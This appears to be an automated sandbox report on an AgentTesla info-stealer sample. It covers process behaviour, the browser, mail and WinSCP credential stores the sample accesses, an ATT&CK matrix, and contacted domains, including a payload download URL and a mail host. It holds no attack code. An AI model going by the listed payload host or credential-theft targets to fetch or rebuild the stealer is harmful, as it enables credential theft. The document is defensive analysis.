Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Code function: 0_2_00405B9C GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405B9C

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7456, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7456, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7456, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	4 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	111 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	36 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Obfuscated Files or Information	1 Credentials in Registry	521 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	11 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	251 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hnTW5HdWvY.exe	50%	ReversingLabs	Win32.Trojan.Generic
hnTW5HdWvY.exe	50%	Virustotal		Browse
hnTW5HdWvY.exe	100%	Avira	HEUR/AGEN.1338492
hnTW5HdWvY.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe	100%	Avira	HEUR/AGEN.1338492
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe	60%	Virustotal		Browse

Source	Detection	Scanner	Label
http://crl.micro	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
lifeartfertility.co.za	102.67.137.82	true	false	high
legodimo.co.za	41.76.215.87	true	false	high
api.ipify.org	104.26.12.205	true	false	high
ip-api.com	208.95.112.1	true	false	high
mail.legodimo.co.za	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.ipify.org/	false	high
https://lifeartfertility.co.za/dKatzZJXqh143.bin	false	high
http://ip-api.com/line/?fields=hosting	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org	wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	hnTW5HdWvY.exe, hnTW5HdWvY.exe.1.dr	false		high
http://crl.micro	powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware URL Reputation: malware	unknown
http://mail.legodimo.co.za	wab.exe, 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.00000000205E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.0000000007210000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	wab.exe, 00000005.00000002.2869316085.0000000020591000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lifeartfertility.co.za/	wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lifeartfertility.co.za/dKatzZJXqh143.bind	wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	hnTW5HdWvY.exe, hnTW5HdWvY.exe.1.dr	false		high
https://api.ipify.org/t	wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmp	false		high
http://legodimo.co.za	wab.exe, 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.00000000205E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2011308617.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBqq	powershell.exe, 00000001.00000002.2011308617.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.0000000007210000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lifeartfertility.co.za/o	wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
102.67.137.82	lifeartfertility.co.za	South Africa	328170	DataKeepersZA	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
41.76.215.87	legodimo.co.za	South Africa	37611	AfrihostZA	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1420850
Start date and time:	2024-04-05 14:28:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hnTW5HdWvY.exe renamed because original name is a hash value
Original Sample Name:	6827f81b3add0570684d911484c7c3a75f4d565123261d4173306ab35e998494.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/20@6/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 95% Number of executed functions: 197 Number of non-executed functions: 47
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 4320 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:28:57	API Interceptor	41x Sleep call for process: powershell.exe modified
14:29:34	API Interceptor	183929x Sleep call for process: wab.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
102.67.137.82	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	POP3.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	CtB0cM3RQI.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	PO03132024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	rPurchaseorder03112024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
208.95.112.1	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	2024-APR salary payroll confirm .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win32.PWSX-gen.21084.5000.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Azizi Riviera Azure works.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	SecuriteInfo.com.Win32.CrypterX-gen.2006.1539.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	xxYQSnZJL6Yb.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	POP3.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	FH4GDGD.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
104.26.12.205	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lifeartfertility.co.za	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	CtB0cM3RQI.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
ip-api.com	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2024-APR salary payroll confirm .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SecuriteInfo.com.Win32.PWSX-gen.21084.5000.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Azizi Riviera Azure works.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.Win32.CrypterX-gen.2006.1539.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	xxYQSnZJL6Yb.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	Pay Off- Statement.msg	Get hash	malicious	HTMLPhisher	Browse	38.91.107.240
	POP3.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
api.ipify.org	K27QM69Lbj.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.13.205
	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	SecuriteInfo.com.Win32.CrypterX-gen.20577.9045.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	MK_Order_200387_pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://celsia.io	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	2024-APR salary payroll confirm .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	SecuriteInfo.com.Win32.PWSX-gen.21084.5000.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	Azizi Riviera Azure works.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	162.159.133.233
	K27QM69Lbj.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.13.205
	https://share-eu1.hsforms.com/1P_6IFHnbRriC_DG56YzVhw2dz72l	Get hash	malicious	HTMLPhisher	Browse	172.65.238.60
	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	1wo0hZ6xkZ.exe	Get hash	malicious	Unknown	Browse	104.21.25.151
	https://minw90432832932ewew.filesdocservicehandler.top/	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	https://tsgagency-my.sharepoint.com/:b:/g/personal/jeff_tsg-agency_com/Eda7F7tlWMVFmAmYZtATPDEB5Oy9EM8J_JXykM348pH-LA?e=Op3WcS	Get hash	malicious	HTMLPhisher	Browse	172.67.189.252
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	DeepLSetup.exe	Get hash	malicious	Unknown	Browse	172.65.225.25
	DeepLSetup.exe	Get hash	malicious	Unknown	Browse	172.65.225.25
AfrihostZA	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	41.76.215.87
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	41.76.215.87
	lUJIhHyHmC.elf	Get hash	malicious	Mirai, Moobot	Browse	169.23.222.2
	QlEroARpo3.elf	Get hash	malicious	Mirai, Moobot	Browse	169.194.182.122
	Y31ikuyDAd.elf	Get hash	malicious	Mirai	Browse	169.69.236.233
	0QDPnpn9tH.elf	Get hash	malicious	Mirai	Browse	169.160.55.93
	35YUJoJHtk.elf	Get hash	malicious	Mirai	Browse	169.167.203.163
	kqdoQHdDvZ.elf	Get hash	malicious	Mirai	Browse	169.99.95.129
	CtB0cM3RQI.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	41.76.215.87
	uTqhN6wE4e.elf	Get hash	malicious	Mirai, Gafgyt	Browse	169.37.91.27
TUT-ASUS	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2024-APR salary payroll confirm .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	SecuriteInfo.com.Win32.PWSX-gen.21084.5000.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Azizi Riviera Azure works.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SecuriteInfo.com.Win32.CrypterX-gen.2006.1539.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	xxYQSnZJL6Yb.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	POP3.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	FH4GDGD.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
DataKeepersZA	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	https://trk.klclick.com/ls/click?upn=u001.Q-2FRM-2Bs26jJfGw5AtNrGvPElR21Fg91L95yj4Iz7-2B9G-2B3KPT4UTHFBvpJSSQd5DbUCa-2FgT20Nr-2FI-2Fl-2Bw02Q5kQVLNQCmEXSYzNqG4I9-2FWzMU-3D_yf-_EMv3ibMoStDGptK1Lms5B9GNcIxUJoI7nZBoidcaOggmj5FAjQl0qnOmLtI1x1Ohc-2BFRm3llFgfvw4mcvsY2XyBfnm98SHSdVCZ86-2BuKsLC9TiMREXmWLtb9XN85omSoULbzgNKo8btbmPCJnm6DuzybU2cyp-2BAjh-2BCBHcGcZ-2BljQXaxBUINeSHu-2Bxv5rrih-2FiSTOEtfcLo-2FbwjHZ3ZafNJBrTlWjJSftzVp-2FcV-2BioF1z5UMgToiIzYHW-2Br37XcJ57c-2FuTma8IFo-2B3lZn3cS-2BLKyyRV321xRUJLTBYZ63nI5Z9Ta0wRgXvdEvqv1OsFX	Get hash	malicious	Unknown	Browse	102.67.141.247
	POP3.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	CtB0cM3RQI.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	PO03132024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	rPurchaseorder03112024.scr.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	CLA Screensaver - Setup - v8.23.0202 - (Eanex Africa).msi	Get hash	malicious	Unknown	Browse	102.22.83.117
	Nov2022 Bill-Charge.html	Get hash	malicious	HTMLPhisher	Browse	160.119.100.32
	Nov2022_Bill-Charge.html	Get hash	malicious	HTMLPhisher	Browse	160.119.100.32

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	K27QM69Lbj.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	update.js	Get hash	malicious	NetSupport RAT	Browse	104.26.12.205
	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	1wo0hZ6xkZ.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	SecuriteInfo.com.Win32.CrypterX-gen.28316.31463.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	receipt.vbs	Get hash	malicious	XWorm	Browse	104.26.12.205
	DOC692-692692.lnk	Get hash	malicious	RHADAMANTHYS	Browse	104.26.12.205
	DOC5723-57235723.lnk	Get hash	malicious	RHADAMANTHYS	Browse	104.26.12.205
	SecuriteInfo.com.Win32.CrypterX-gen.20577.9045.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
37f463bf4616ecd445d4a1937da06e19	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	102.67.137.82
	kdrajK1oD8.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	NBKi8t8shT.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	PRm6reI7bQ.exe	Get hash	malicious	DarkCloud	Browse	102.67.137.82
	receipt.vbs	Get hash	malicious	XWorm	Browse	102.67.137.82
	file.exe	Get hash	malicious	Vidar	Browse	102.67.137.82
	2024-APR salary payroll confirm .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	102.67.137.82
	hoDogZKrIh.exe	Get hash	malicious	Meduza Stealer	Browse	102.67.137.82
	BitwarSetup.exe	Get hash	malicious	Unknown	Browse	102.67.137.82
	processlassosetup64.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	102.67.137.82

Process:	C:\Users\user\Desktop\hnTW5HdWvY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	46
Entropy (8bit):	4.205536075989824
Encrypted:	false
SSDEEP:	3:xKV4gAi4XDNyMAJ7Ay:QVQi4TNyMsEy
MD5:	F53075DB719E1EEEE197FD3D1F21F853
SHA1:	8638A860BB687ECB6DC5F261673B434DF1BB4B12
